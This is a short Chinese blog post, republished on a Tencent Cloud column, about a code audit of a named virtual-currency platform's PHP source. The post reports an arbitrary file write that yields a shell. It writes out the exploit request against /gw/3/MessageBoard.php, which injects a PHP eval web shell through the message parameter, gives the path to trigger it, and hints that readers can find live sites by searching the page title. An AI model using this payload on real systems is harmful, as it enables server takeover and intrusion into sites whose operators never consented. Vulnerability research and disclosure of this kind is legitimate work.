前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >新鲜出炉某"虚拟币"通用程序GetShell,"真香"

新鲜出炉某"虚拟币"通用程序GetShell,"真香"

作者头像
用户1467662
发布2019-04-19 16:16:04
7290
发布2019-04-19 16:16:04
举报
文章被收录于专栏:农夫安全农夫安全

文章Form:圈子社区。

0 0x01 嘿嘿嘿

没事闲得慌就想在gayhub搜点php源码审一审,搜到一个虚拟币平台的源码。

源码奉上:https://github.com/maole01/otc

整 0x02 整理思路

一般来说这种站都是挖的SQL注入之类的,如果用的是TP框架的话 也可以看看日志文件路径。不过这次挖到的是一个任意文件写入,可以直接getshell。 为了祖国繁荣富强,紧跟党走,打击非法集资,非法运营,传销骗钱...emmmmm

0x 0x03 漏洞描述

首先祭起法师大大的源代码审计工具,正则匹配来一波,发现有个文件有点问题。

后面还注释....打开看一下果真还是有点问题的。

首先呢,是通过GET传递过来数据 后面呢定义一个数组 把数据加到里面 接着呢就是定义一下路径 以及 文件名。

这个地方就直接写出来了。把获取到的数据 保存出来。(这个文件写的简直就像后门)

0x 0x04 漏洞验证

本地验证

访问:/gw/3/MessageBoard.php?type=123&name=123&email=123@qq.com&subject=123123&message="}]<?php @eval($_POST['x']);?>//123 访问:/gw/3/saveMessageBoardData.php

直接拿title搜吧 关键词也不找了

0x 0x05 最后

嘿嘿嘿 要跟党走

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-01-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0 0x01 嘿嘿嘿
  • 整 0x02 整理思路
  • 0x 0x03 漏洞描述
  • 0x 0x04 漏洞验证
  • 0x 0x05 最后
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档